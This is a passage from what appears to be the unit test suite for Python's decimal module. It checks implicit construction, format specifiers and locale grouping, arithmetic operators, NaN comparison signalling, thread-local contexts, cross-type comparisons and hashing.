class PyExplicitConstructionTest(ExplicitConstructionTest):
decimal = P
class ImplicitConstructionTest(unittest.TestCase):
'''Unit tests for Implicit Construction cases of Decimal.'''
def test_implicit_from_None(self):
Decimal = self.decimal.Decimal
self.assertRaises(TypeError, eval, 'Decimal(5) + None', locals())
def test_implicit_from_int(self):
Decimal = self.decimal.Decimal
#normal
self.assertEqual(str(Decimal(5) + 45), '50')
#exceeding precision
self.assertEqual(Decimal(5) + 123456789000, Decimal(123456789000))
def test_implicit_from_string(self):
Decimal = self.decimal.Decimal
self.assertRaises(TypeError, eval, 'Decimal(5) + "3"', locals())
def test_implicit_from_float(self):
Decimal = self.decimal.Decimal
self.assertRaises(TypeError, eval, 'Decimal(5) + 2.2', locals())
def test_implicit_from_Decimal(self):
Decimal = self.decimal.Decimal
self.assertEqual(Decimal(5) + Decimal(45), Decimal(50))
def test_rop(self):
Decimal = self.decimal.Decimal
# Allow other classes to be trained to interact with Decimals
class E:
def __divmod__(self, other):
return 'divmod ' + str(other)
def __rdivmod__(self, other):
return str(other) + ' rdivmod'
def __lt__(self, other):
return 'lt ' + str(other)
def __gt__(self, other):
return 'gt ' + str(other)
def __le__(self, other):
return 'le ' + str(other)
def __ge__(self, other):
return 'ge ' + str(other)
def __eq__(self, other):
return 'eq ' + str(other)
def __ne__(self, other):
return 'ne ' + str(other)
self.assertEqual(divmod(E(), Decimal(10)), 'divmod 10')
self.assertEqual(divmod(Decimal(10), E()), '10 rdivmod')
self.assertEqual(eval('Decimal(10) < E()'), 'gt 10')
self.assertEqual(eval('Decimal(10) > E()'), 'lt 10')
self.assertEqual(eval('Decimal(10) <= E()'), 'ge 10')
self.assertEqual(eval('Decimal(10) >= E()'), 'le 10')
self.assertEqual(eval('Decimal(10) == E()'), 'eq 10')
self.assertEqual(eval('Decimal(10) != E()'), 'ne 10')
# insert operator methods and then exercise them
oplist = [
('+', '__add__', '__radd__'),
('-', '__sub__', '__rsub__'),
('*', '__mul__', '__rmul__'),
('/', '__truediv__', '__rtruediv__'),
('%', '__mod__', '__rmod__'),
('//', '__floordiv__', '__rfloordiv__'),
('**', '__pow__', '__rpow__')
]
for sym, lop, rop in oplist:
setattr(E, lop, lambda self, other: 'str' + lop + str(other))
setattr(E, rop, lambda self, other: str(other) + rop + 'str')
self.assertEqual(eval('E()' + sym + 'Decimal(10)'),
'str' + lop + '10')
self.assertEqual(eval('Decimal(10)' + sym + 'E()'),
'10' + rop + 'str')
class CImplicitConstructionTest(ImplicitConstructionTest):
decimal = C
class PyImplicitConstructionTest(ImplicitConstructionTest):
decimal = P
class FormatTest(unittest.TestCase):
'''Unit tests for the format function.'''
def test_formatting(self):
Decimal = self.decimal.Decimal
# triples giving a format, a Decimal, and the expected result
test_values = [
('e', '0E-15', '0e-15'),
('e', '2.3E-15', '2.3e-15'),
('e', '2.30E+2', '2.30e+2'), # preserve significant zeros
('e', '2.30000E-15', '2.30000e-15'),
('e', '1.23456789123456789e40', '1.23456789123456789e+40'),
('e', '1.5', '1.5e+0'),
('e', '0.15', '1.5e-1'),
('e', '0.015', '1.5e-2'),
('e', '0.0000000000015', '1.5e-12'),
('e', '15.0', '1.50e+1'),
('e', '-15', '-1.5e+1'),
('e', '0', '0e+0'),
('e', '0E1', '0e+1'),
('e', '0.0', '0e-1'),
('e', '0.00', '0e-2'),
('.6e', '0E-15', '0.000000e-9'),
('.6e', '0', '0.000000e+6'),
('.6e', '9.999999', '9.999999e+0'),
('.6e', '9.9999999', '1.000000e+1'),
('.6e', '-1.23e5', '-1.230000e+5'),
('.6e', '1.23456789e-3', '1.234568e-3'),
('f', '0', '0'),
('f', '0.0', '0.0'),
('f', '0E-2', '0.00'),
('f', '0.00E-8', '0.0000000000'),
('f', '0E1', '0'), # loses exponent information
('f', '3.2E1', '32'),
('f', '3.2E2', '320'),
('f', '3.20E2', '320'),
('f', '3.200E2', '320.0'),
('f', '3.2E-6', '0.0000032'),
('.6f', '0E-15', '0.000000'), # all zeros treated equally
('.6f', '0E1', '0.000000'),
('.6f', '0', '0.000000'),
('.0f', '0', '0'), # no decimal point
('.0f', '0e-2', '0'),
('.0f', '3.14159265', '3'),
('.1f', '3.14159265', '3.1'),
('.4f', '3.14159265', '3.1416'),
('.6f', '3.14159265', '3.141593'),
('.7f', '3.14159265', '3.1415926'), # round-half-even!
('.8f', '3.14159265', '3.14159265'),
('.9f', '3.14159265', '3.141592650'),
('g', '0', '0'),
('g', '0.0', '0.0'),
('g', '0E1', '0e+1'),
('G', '0E1', '0E+1'),
('g', '0E-5', '0.00000'),
('g', '0E-6', '0.000000'),
('g', '0E-7', '0e-7'),
('g', '-0E2', '-0e+2'),
('.0g', '3.14159265', '3'), # 0 sig fig -> 1 sig fig
('.0n', '3.14159265', '3'), # same for 'n'
('.1g', '3.14159265', '3'),
('.2g', '3.14159265', '3.1'),
('.5g', '3.14159265', '3.1416'),
('.7g', '3.14159265', '3.141593'),
('.8g', '3.14159265', '3.1415926'), # round-half-even!
('.9g', '3.14159265', '3.14159265'),
('.10g', '3.14159265', '3.14159265'), # don't pad
('%', '0E1', '0%'),
('%', '0E0', '0%'),
('%', '0E-1', '0%'),
('%', '0E-2', '0%'),
('%', '0E-3', '0.0%'),
('%', '0E-4', '0.00%'),
('.3%', '0', '0.000%'), # all zeros treated equally
('.3%', '0E10', '0.000%'),
('.3%', '0E-10', '0.000%'),
('.3%', '2.34', '234.000%'),
('.3%', '1.234567', '123.457%'),
('.0%', '1.23', '123%'),
('e', 'NaN', 'NaN'),
('f', '-NaN123', '-NaN123'),
('+g', 'NaN456', '+NaN456'),
('.3e', 'Inf', 'Infinity'),
('.16f', '-Inf', '-Infinity'),
('.0g', '-sNaN', '-sNaN'),
('', '1.00', '1.00'),
# test alignment and padding
('6', '123', ' 123'),
('<6', '123', '123 '),
('>6', '123', ' 123'),
('^6', '123', ' 123 '),
('=+6', '123', '+ 123'),
('#<10', 'NaN', 'NaN#######'),
('#<10', '-4.3', '-4.3######'),
('#<+10', '0.0130', '+0.0130###'),
('#< 10', '0.0130', ' 0.0130###'),
('@>10', '-Inf', '@-Infinity'),
('#>5', '-Inf', '-Infinity'),
('?^5', '123', '?123?'),
('%^6', '123', '%123%%'),
(' ^6', '-45.6', '-45.6 '),
('/=10', '-45.6', '-/////45.6'),
('/=+10', '45.6', '+/////45.6'),
('/= 10', '45.6', ' /////45.6'),
('\x00=10', '-inf', '-\x00Infinity'),
('\x00^16', '-inf', '\x00\x00\x00-Infinity\x00\x00\x00\x00'),
('\x00>10', '1.2345', '\x00\x00\x00\x001.2345'),
('\x00<10', '1.2345', '1.2345\x00\x00\x00\x00'),
# thousands separator
(',', '1234567', '1,234,567'),
(',', '123456', '123,456'),
(',', '12345', '12,345'),
(',', '1234', '1,234'),
(',', '123', '123'),
(',', '12', '12'),
(',', '1', '1'),
(',', '0', '0'),
(',', '-1234567', '-1,234,567'),
(',', '-123456', '-123,456'),
('7,', '123456', '123,456'),
('8,', '123456', ' 123,456'),
('08,', '123456', '0,123,456'), # special case: extra 0 needed
('+08,', '123456', '+123,456'), # but not if there's a sign
(' 08,', '123456', ' 123,456'),
('08,', '-123456', '-123,456'),
('+09,', '123456', '+0,123,456'),
# ... with fractional part...
('07,', '1234.56', '1,234.56'),
('08,', '1234.56', '1,234.56'),
('09,', '1234.56', '01,234.56'),
('010,', '1234.56', '001,234.56'),
('011,', '1234.56', '0,001,234.56'),
('012,', '1234.56', '0,001,234.56'),
('08,.1f', '1234.5', '01,234.5'),
# no thousands separators in fraction part
(',', '1.23456789', '1.23456789'),
(',%', '123.456789', '12,345.6789%'),
(',e', '123456', '1.23456e+5'),
(',E', '123456', '1.23456E+5'),
# issue 6850
('a=-7.0', '0.12345', 'aaaa0.1'),
# issue 22090
('<^+15.20%', 'inf', '<<+Infinity%<<<'),
('\x07>,%', 'sNaN1234567', 'sNaN1234567%'),
('=10.10%', 'NaN123', ' NaN123%'),
]
for fmt, d, result in test_values:
self.assertEqual(format(Decimal(d), fmt), result)
# bytes format argument
self.assertRaises(TypeError, Decimal(1).__format__, b'-020')
def test_n_format(self):
Decimal = self.decimal.Decimal
try:
from locale import CHAR_MAX
except ImportError:
self.skipTest('locale.CHAR_MAX not available')
def make_grouping(lst):
return ''.join([chr(x) for x in lst]) if self.decimal == C else lst
def get_fmt(x, override=None, fmt='n'):
if self.decimal == C:
return Decimal(x).__format__(fmt, override)
else:
return Decimal(x).__format__(fmt, _localeconv=override)
# Set up some localeconv-like dictionaries
en_US = {
'decimal_point' : '.',
'grouping' : make_grouping([3, 3, 0]),
'thousands_sep' : ','
}
fr_FR = {
'decimal_point' : ',',
'grouping' : make_grouping([CHAR_MAX]),
'thousands_sep' : ''
}
ru_RU = {
'decimal_point' : ',',
'grouping': make_grouping([3, 3, 0]),
'thousands_sep' : ' '
}
crazy = {
'decimal_point' : '&',
'grouping': make_grouping([1, 4, 2, CHAR_MAX]),
'thousands_sep' : '-'
}
dotsep_wide = {
'decimal_point' : b'\xc2\xbf'.decode('utf-8'),
'grouping': make_grouping([3, 3, 0]),
'thousands_sep' : b'\xc2\xb4'.decode('utf-8')
}
self.assertEqual(get_fmt(Decimal('12.7'), en_US), '12.7')
self.assertEqual(get_fmt(Decimal('12.7'), fr_FR), '12,7')
self.assertEqual(get_fmt(Decimal('12.7'), ru_RU), '12,7')
self.assertEqual(get_fmt(Decimal('12.7'), crazy), '1-2&7')
self.assertEqual(get_fmt(123456789, en_US), '123,456,789')
self.assertEqual(get_fmt(123456789, fr_FR), '123456789')
self.assertEqual(get_fmt(123456789, ru_RU), '123 456 789')
self.assertEqual(get_fmt(1234567890123, crazy), '123456-78-9012-3')
self.assertEqual(get_fmt(123456789, en_US, '.6n'), '1.23457e+8')
self.assertEqual(get_fmt(123456789, fr_FR, '.6n'), '1,23457e+8')
self.assertEqual(get_fmt(123456789, ru_RU, '.6n'), '1,23457e+8')
self.assertEqual(get_fmt(123456789, crazy, '.6n'), '1&23457e+8')
# zero padding
self.assertEqual(get_fmt(1234, fr_FR, '03n'), '1234')
self.assertEqual(get_fmt(1234, fr_FR, '04n'), '1234')
self.assertEqual(get_fmt(1234, fr_FR, '05n'), '01234')
self.assertEqual(get_fmt(1234, fr_FR, '06n'), '001234')
self.assertEqual(get_fmt(12345, en_US, '05n'), '12,345')
self.assertEqual(get_fmt(12345, en_US, '06n'), '12,345')
self.assertEqual(get_fmt(12345, en_US, '07n'), '012,345')
self.assertEqual(get_fmt(12345, en_US, '08n'), '0,012,345')
self.assertEqual(get_fmt(12345, en_US, '09n'), '0,012,345')
self.assertEqual(get_fmt(12345, en_US, '010n'), '00,012,345')
self.assertEqual(get_fmt(123456, crazy, '06n'), '1-2345-6')
self.assertEqual(get_fmt(123456, crazy, '07n'), '1-2345-6')
self.assertEqual(get_fmt(123456, crazy, '08n'), '1-2345-6')
self.assertEqual(get_fmt(123456, crazy, '09n'), '01-2345-6')
self.assertEqual(get_fmt(123456, crazy, '010n'), '0-01-2345-6')
self.assertEqual(get_fmt(123456, crazy, '011n'), '0-01-2345-6')
self.assertEqual(get_fmt(123456, crazy, '012n'), '00-01-2345-6')
self.assertEqual(get_fmt(123456, crazy, '013n'), '000-01-2345-6')
# wide char separator and decimal point
self.assertEqual(get_fmt(Decimal('-1.5'), dotsep_wide, '020n'),
'-0\u00b4000\u00b4000\u00b4000\u00b4001\u00bf5')
@run_with_locale('LC_ALL', 'ps_AF')
def test_wide_char_separator_decimal_point(self):
# locale with wide char separator and decimal point
Decimal = self.decimal.Decimal
decimal_point = locale.localeconv()['decimal_point']
thousands_sep = locale.localeconv()['thousands_sep']
if decimal_point != '\u066b':
self.skipTest('inappropriate decimal point separator '
'({!a} not {!a})'.format(decimal_point, '\u066b'))
if thousands_sep != '\u066c':
self.skipTest('inappropriate thousands separator '
'({!a} not {!a})'.format(thousands_sep, '\u066c'))
self.assertEqual(format(Decimal('100000000.123'), 'n'),
'100\u066c000\u066c000\u066b123')
def test_decimal_from_float_argument_type(self):
class A(self.decimal.Decimal):
def __init__(self, a):
self.a_type = type(a)
a = A.from_float(42.5)
self.assertEqual(self.decimal.Decimal, a.a_type)
a = A.from_float(42)
self.assertEqual(self.decimal.Decimal, a.a_type)
class CFormatTest(FormatTest):
decimal = C
class PyFormatTest(FormatTest):
decimal = P
class ArithmeticOperatorsTest(unittest.TestCase):
'''Unit tests for all arithmetic operators, binary and unary.'''
def test_addition(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-11.1')
d2 = Decimal('22.2')
#two Decimals
self.assertEqual(d1+d2, Decimal('11.1'))
self.assertEqual(d2+d1, Decimal('11.1'))
#with other type, left
c = d1 + 5
self.assertEqual(c, Decimal('-6.1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 5 + d1
self.assertEqual(c, Decimal('-6.1'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 += d2
self.assertEqual(d1, Decimal('11.1'))
#inline with other type
d1 += 5
self.assertEqual(d1, Decimal('16.1'))
def test_subtraction(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-11.1')
d2 = Decimal('22.2')
#two Decimals
self.assertEqual(d1-d2, Decimal('-33.3'))
self.assertEqual(d2-d1, Decimal('33.3'))
#with other type, left
c = d1 - 5
self.assertEqual(c, Decimal('-16.1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 5 - d1
self.assertEqual(c, Decimal('16.1'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 -= d2
self.assertEqual(d1, Decimal('-33.3'))
#inline with other type
d1 -= 5
self.assertEqual(d1, Decimal('-38.3'))
def test_multiplication(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-5')
d2 = Decimal('3')
#two Decimals
self.assertEqual(d1*d2, Decimal('-15'))
self.assertEqual(d2*d1, Decimal('-15'))
#with other type, left
c = d1 * 5
self.assertEqual(c, Decimal('-25'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 5 * d1
self.assertEqual(c, Decimal('-25'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 *= d2
self.assertEqual(d1, Decimal('-15'))
#inline with other type
d1 *= 5
self.assertEqual(d1, Decimal('-75'))
def test_division(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1/d2, Decimal('-2.5'))
self.assertEqual(d2/d1, Decimal('-0.4'))
#with other type, left
c = d1 / 4
self.assertEqual(c, Decimal('-1.25'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 4 / d1
self.assertEqual(c, Decimal('-0.8'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 /= d2
self.assertEqual(d1, Decimal('-2.5'))
#inline with other type
d1 /= 4
self.assertEqual(d1, Decimal('-0.625'))
def test_floor_division(self):
Decimal = self.decimal.Decimal
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1//d2, Decimal('2'))
self.assertEqual(d2//d1, Decimal('0'))
#with other type, left
c = d1 // 4
self.assertEqual(c, Decimal('1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 7 // d1
self.assertEqual(c, Decimal('1'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 //= d2
self.assertEqual(d1, Decimal('2'))
#inline with other type
d1 //= 2
self.assertEqual(d1, Decimal('1'))
def test_powering(self):
Decimal = self.decimal.Decimal
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1**d2, Decimal('25'))
self.assertEqual(d2**d1, Decimal('32'))
#with other type, left
c = d1 ** 4
self.assertEqual(c, Decimal('625'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 7 ** d1
self.assertEqual(c, Decimal('16807'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 **= d2
self.assertEqual(d1, Decimal('25'))
#inline with other type
d1 **= 4
self.assertEqual(d1, Decimal('390625'))
def test_module(self):
Decimal = self.decimal.Decimal
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1%d2, Decimal('1'))
self.assertEqual(d2%d1, Decimal('2'))
#with other type, left
c = d1 % 4
self.assertEqual(c, Decimal('1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 7 % d1
self.assertEqual(c, Decimal('2'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 %= d2
self.assertEqual(d1, Decimal('1'))
#inline with other type
d1 %= 4
self.assertEqual(d1, Decimal('1'))
def test_floor_div_module(self):
Decimal = self.decimal.Decimal
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
(p, q) = divmod(d1, d2)
self.assertEqual(p, Decimal('2'))
self.assertEqual(q, Decimal('1'))
self.assertEqual(type(p), type(d1))
self.assertEqual(type(q), type(d1))
#with other type, left
(p, q) = divmod(d1, 4)
self.assertEqual(p, Decimal('1'))
self.assertEqual(q, Decimal('1'))
self.assertEqual(type(p), type(d1))
self.assertEqual(type(q), type(d1))
#with other type, right
(p, q) = divmod(7, d1)
self.assertEqual(p, Decimal('1'))
self.assertEqual(q, Decimal('2'))
self.assertEqual(type(p), type(d1))
self.assertEqual(type(q), type(d1))
def test_unary_operators(self):
Decimal = self.decimal.Decimal
self.assertEqual(+Decimal(45), Decimal(+45)) # +
self.assertEqual(-Decimal(45), Decimal(-45)) # -
self.assertEqual(abs(Decimal(45)), abs(Decimal(-45))) # abs
def test_nan_comparisons(self):
# comparisons involving signaling nans signal InvalidOperation
# order comparisons (<, <=, >, >=) involving only quiet nans
# also signal InvalidOperation
# equality comparisons (==, !=) involving only quiet nans
# don't signal, but return False or True respectively.
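        # A quick illustration of the rules above (with the InvalidOperation
        # trap enabled, as in the second half of this test):
        #   Decimal('NaN') == Decimal('2')   -> False, no signal
        #   Decimal('NaN') <  Decimal('2')   -> raises InvalidOperation
        #   Decimal('sNaN') == Decimal('2')  -> raises InvalidOperation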
Decimal = self.decimal.Decimal
InvalidOperation = self.decimal.InvalidOperation
localcontext = self.decimal.localcontext
n = Decimal('NaN')
s = Decimal('sNaN')
i = Decimal('Inf')
f = Decimal('2')
qnan_pairs = (n, n), (n, i), (i, n), (n, f), (f, n)
snan_pairs = (s, n), (n, s), (s, i), (i, s), (s, f), (f, s), (s, s)
order_ops = operator.lt, operator.le, operator.gt, operator.ge
equality_ops = operator.eq, operator.ne
# results when InvalidOperation is not trapped
for x, y in qnan_pairs + snan_pairs:
for op in order_ops + equality_ops:
got = op(x, y)
expected = True if op is operator.ne else False
self.assertIs(expected, got,
"expected {0!r} for operator.{1}({2!r}, {3!r}); "
"got {4!r}".format(
expected, op.__name__, x, y, got))
# repeat the above, but this time trap the InvalidOperation
with localcontext() as ctx:
ctx.traps[InvalidOperation] = 1
for x, y in qnan_pairs:
for op in equality_ops:
got = op(x, y)
expected = True if op is operator.ne else False
self.assertIs(expected, got,
"expected {0!r} for "
"operator.{1}({2!r}, {3!r}); "
"got {4!r}".format(
expected, op.__name__, x, y, got))
for x, y in snan_pairs:
for op in equality_ops:
self.assertRaises(InvalidOperation, operator.eq, x, y)
self.assertRaises(InvalidOperation, operator.ne, x, y)
for x, y in qnan_pairs + snan_pairs:
for op in order_ops:
self.assertRaises(InvalidOperation, op, x, y)
def test_copy_sign(self):
Decimal = self.decimal.Decimal
d = Decimal(1).copy_sign(Decimal(-2))
self.assertEqual(Decimal(1).copy_sign(-2), d)
self.assertRaises(TypeError, Decimal(1).copy_sign, '-2')
class CArithmeticOperatorsTest(ArithmeticOperatorsTest):
decimal = C
class PyArithmeticOperatorsTest(ArithmeticOperatorsTest):
decimal = P
# The following are two functions used to test threading in the next class
def thfunc1(cls):
Decimal = cls.decimal.Decimal
InvalidOperation = cls.decimal.InvalidOperation
DivisionByZero = cls.decimal.DivisionByZero
Overflow = cls.decimal.Overflow
Underflow = cls.decimal.Underflow
Inexact = cls.decimal.Inexact
getcontext = cls.decimal.getcontext
localcontext = cls.decimal.localcontext
d1 = Decimal(1)
d3 = Decimal(3)
test1 = d1/d3
cls.finish1.set()
cls.synchro.wait()
test2 = d1/d3
with localcontext() as c2:
cls.assertTrue(c2.flags[Inexact])
cls.assertRaises(DivisionByZero, c2.divide, d1, 0)
cls.assertTrue(c2.flags[DivisionByZero])
with localcontext() as c3:
cls.assertTrue(c3.flags[Inexact])
cls.assertTrue(c3.flags[DivisionByZero])
cls.assertRaises(InvalidOperation, c3.compare, d1, Decimal('sNaN'))
cls.assertTrue(c3.flags[InvalidOperation])
del c3
cls.assertFalse(c2.flags[InvalidOperation])
del c2
cls.assertEqual(test1, Decimal('0.333333333333333333333333'))
cls.assertEqual(test2, Decimal('0.333333333333333333333333'))
c1 = getcontext()
cls.assertTrue(c1.flags[Inexact])
for sig in Overflow, Underflow, DivisionByZero, InvalidOperation:
cls.assertFalse(c1.flags[sig])
def thfunc2(cls):
Decimal = cls.decimal.Decimal
InvalidOperation = cls.decimal.InvalidOperation
DivisionByZero = cls.decimal.DivisionByZero
Overflow = cls.decimal.Overflow
Underflow = cls.decimal.Underflow
Inexact = cls.decimal.Inexact
getcontext = cls.decimal.getcontext
localcontext = cls.decimal.localcontext
d1 = Decimal(1)
d3 = Decimal(3)
test1 = d1/d3
thiscontext = getcontext()
thiscontext.prec = 18
test2 = d1/d3
with localcontext() as c2:
cls.assertTrue(c2.flags[Inexact])
cls.assertRaises(Overflow, c2.multiply, Decimal('1e425000000'), 999)
cls.assertTrue(c2.flags[Overflow])
with localcontext(thiscontext) as c3:
cls.assertTrue(c3.flags[Inexact])
cls.assertFalse(c3.flags[Overflow])
c3.traps[Underflow] = True
cls.assertRaises(Underflow, c3.divide, Decimal('1e-425000000'), 999)
cls.assertTrue(c3.flags[Underflow])
del c3
cls.assertFalse(c2.flags[Underflow])
cls.assertFalse(c2.traps[Underflow])
del c2
cls.synchro.set()
cls.finish2.set()
cls.assertEqual(test1, Decimal('0.333333333333333333333333'))
cls.assertEqual(test2, Decimal('0.333333333333333333'))
cls.assertFalse(thiscontext.traps[Underflow])
cls.assertTrue(thiscontext.flags[Inexact])
for sig in Overflow, Underflow, DivisionByZero, InvalidOperation:
cls.assertFalse(thiscontext.flags[sig])
class ThreadingTest(unittest.TestCase):
'''Unit tests for thread local contexts in Decimal.'''
# Take care executing this test from IDLE, there's an issue in threading
# that hangs IDLE and I couldn't find it
def test_threading(self):
DefaultContext = self.decimal.DefaultContext
if self.decimal == C and not self.decimal.HAVE_THREADS:
self.skipTest("compiled without threading")
# Test the "threading isolation" of a Context. Also test changing
# the DefaultContext, which acts as a template for the thread-local
# contexts.
save_prec = DefaultContext.prec
save_emax = DefaultContext.Emax
save_emin = DefaultContext.Emin
DefaultContext.prec = 24
DefaultContext.Emax = 425000000
DefaultContext.Emin = -425000000
self.synchro = threading.Event()
self.finish1 = threading.Event()
self.finish2 = threading.Event()
th1 = threading.Thread(target=thfunc1, args=(self,))
th2 = threading.Thread(target=thfunc2, args=(self,))
th1.start()
th2.start()
self.finish1.wait()
self.finish2.wait()
for sig in Signals[self.decimal]:
self.assertFalse(DefaultContext.flags[sig])
th1.join()
th2.join()
DefaultContext.prec = save_prec
DefaultContext.Emax = save_emax
DefaultContext.Emin = save_emin
class CThreadingTest(ThreadingTest):
decimal = C
class PyThreadingTest(ThreadingTest):
decimal = P
class UsabilityTest(unittest.TestCase):
'''Unit tests for Usability cases of Decimal.'''
def test_comparison_operators(self):
Decimal = self.decimal.Decimal
da = Decimal('23.42')
db = Decimal('23.42')
dc = Decimal('45')
#two Decimals
self.assertGreater(dc, da)
self.assertGreaterEqual(dc, da)
self.assertLess(da, dc)
self.assertLessEqual(da, dc)
self.assertEqual(da, db)
self.assertNotEqual(da, dc)
self.assertLessEqual(da, db)
self.assertGreaterEqual(da, db)
#a Decimal and an int
self.assertGreater(dc, 23)
self.assertLess(23, dc)
self.assertEqual(dc, 45)
#a Decimal and uncomparable
self.assertNotEqual(da, 'ugly')
self.assertNotEqual(da, 32.7)
self.assertNotEqual(da, object())
self.assertNotEqual(da, object)
# sortable
a = list(map(Decimal, range(100)))
b = a[:]
random.shuffle(a)
a.sort()
self.assertEqual(a, b)
def test_decimal_float_comparison(self):
Decimal = self.decimal.Decimal
da = Decimal('0.25')
db = Decimal('3.0')
self.assertLess(da, 3.0)
self.assertLessEqual(da, 3.0)
self.assertGreater(db, 0.25)
self.assertGreaterEqual(db, 0.25)
self.assertNotEqual(da, 1.5)
self.assertEqual(da, 0.25)
self.assertGreater(3.0, da)
self.assertGreaterEqual(3.0, da)
self.assertLess(0.25, db)
self.assertLessEqual(0.25, db)
self.assertNotEqual(0.25, db)
self.assertEqual(3.0, db)
self.assertNotEqual(0.1, Decimal('0.1'))
def test_decimal_complex_comparison(self):
Decimal = self.decimal.Decimal
da = Decimal('0.25')
db = Decimal('3.0')
self.assertNotEqual(da, (1.5+0j))
self.assertNotEqual((1.5+0j), da)
self.assertEqual(da, (0.25+0j))
self.assertEqual((0.25+0j), da)
self.assertEqual((3.0+0j), db)
self.assertEqual(db, (3.0+0j))
self.assertNotEqual(db, (3.0+1j))
self.assertNotEqual((3.0+1j), db)
self.assertIs(db.__lt__(3.0+0j), NotImplemented)
self.assertIs(db.__le__(3.0+0j), NotImplemented)
self.assertIs(db.__gt__(3.0+0j), NotImplemented)
        self.assertIs(db.__ge__(3.0+0j), NotImplemented)
def test_decimal_fraction_comparison(self):
D = self.decimal.Decimal
F = fractions[self.decimal].Fraction
Context = self.decimal.Context
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
emax = C.MAX_EMAX if C else 999999999
emin = C.MIN_EMIN if C else -999999999
etiny = C.MIN_ETINY if C else -1999999997
c = Context(Emax=emax, Emin=emin)
with localcontext(c):
c.prec = emax
self.assertLess(D(0), F(1,9999999999999999999999999999999999999))
self.assertLess(F(-1,9999999999999999999999999999999999999), D(0))
self.assertLess(F(0,1), D("1e" + str(etiny)))
self.assertLess(D("-1e" + str(etiny)), F(0,1))
self.assertLess(F(0,9999999999999999999999999), D("1e" + str(etiny)))
self.assertLess(D("-1e" + str(etiny)), F(0,9999999999999999999999999))
self.assertEqual(D("0.1"), F(1,10))
self.assertEqual(F(1,10), D("0.1"))
c.prec = 300
self.assertNotEqual(D(1)/3, F(1,3))
self.assertNotEqual(F(1,3), D(1)/3)
self.assertLessEqual(F(120984237, 9999999999), D("9e" + str(emax)))
self.assertGreaterEqual(D("9e" + str(emax)), F(120984237, 9999999999))
self.assertGreater(D('inf'), F(99999999999,123))
self.assertGreater(D('inf'), F(-99999999999,123))
self.assertLess(D('-inf'), F(99999999999,123))
self.assertLess(D('-inf'), F(-99999999999,123))
self.assertRaises(InvalidOperation, D('nan').__gt__, F(-9,123))
self.assertIs(NotImplemented, F(-9,123).__lt__(D('nan')))
self.assertNotEqual(D('nan'), F(-9,123))
self.assertNotEqual(F(-9,123), D('nan'))
def test_copy_and_deepcopy_methods(self):
Decimal = self.decimal.Decimal
d = Decimal('43.24')
c = copy.copy(d)
self.assertEqual(id(c), id(d))
dc = copy.deepcopy(d)
self.assertEqual(id(dc), id(d))
def test_hash_method(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
def hashit(d):
a = hash(d)
b = d.__hash__()
self.assertEqual(a, b)
return a
#just that it's hashable
hashit(Decimal(23))
hashit(Decimal('Infinity'))
hashit(Decimal('-Infinity'))
hashit(Decimal('nan123'))
hashit(Decimal('-NaN'))
test_values = [Decimal(sign*(2**m + n))
for m in [0, 14, 15, 16, 17, 30, 31,
32, 33, 61, 62, 63, 64, 65, 66]
for n in range(-10, 10)
for sign in [-1, 1]]
test_values.extend([
Decimal("-1"), # ==> -2
Decimal("-0"), # zeros
Decimal("0.00"),
Decimal("-0.000"),
Decimal("0E10"),
Decimal("-0E12"),
Decimal("10.0"), # negative exponent
Decimal("-23.00000"),
Decimal("1230E100"), # positive exponent
Decimal("-4.5678E50"),
# a value for which hash(n) != hash(n % (2**64-1))
# in Python pre-2.6
Decimal(2**64 + 2**32 - 1),
# selection of values which fail with the old (before
# version 2.6) long.__hash__
Decimal("1.634E100"),
Decimal("90.697E100"),
Decimal("188.83E100"),
Decimal("1652.9E100"),
Decimal("56531E100"),
])
# check that hash(d) == hash(int(d)) for integral values
for value in test_values:
self.assertEqual(hashit(value), hashit(int(value)))
#the same hash that to an int
self.assertEqual(hashit(Decimal(23)), hashit(23))
self.assertRaises(TypeError, hash, Decimal('sNaN'))
self.assertTrue(hashit(Decimal('Inf')))
self.assertTrue(hashit(Decimal('-Inf')))
# check that the hashes of a Decimal float match when they
# represent exactly the same values
test_strings = ['inf', '-Inf', '0.0', '-.0e1',
'34.0', '2.5', '112390.625', '-0.515625']
for s in test_strings:
f = float(s)
d = Decimal(s)
self.assertEqual(hashit(f), hashit(d))
with localcontext() as c:
# check that the value of the hash doesn't depend on the
# current context (issue #1757)
x = Decimal("123456789.1")
c.prec = 6
h1 = hashit(x)
c.prec = 10
h2 = hashit(x)
c.prec = 16
h3 = hashit(x)
self.assertEqual(h1, h2)
self.assertEqual(h1, h3)
c.prec = 10000
x = 1100 ** 1248
self.assertEqual(hashit(Decimal(x)), hashit(x))
def test_min_and_max_methods(self):
Decimal = self.decimal.Decimal
d1 = Decimal('15.32')
d2 = Decimal('28.5')
l1 = 15
l2 = 28
#between Decimals
self.assertIs(min(d1,d2), d1)
self.assertIs(min(d2,d1), d1)
self.assertIs(max(d1,d2), d2)
self.assertIs(max(d2,d1), d2)
#between Decimal and int
self.assertIs(min(d1,l2), d1)
self.assertIs(min(l2,d1), d1)
self.assertIs(max(l1,d2), d2)
self.assertIs(max(d2,l1), d2)
def test_as_nonzero(self):
Decimal = self.decimal.Decimal
#as false
self.assertFalse(Decimal(0))
#as true
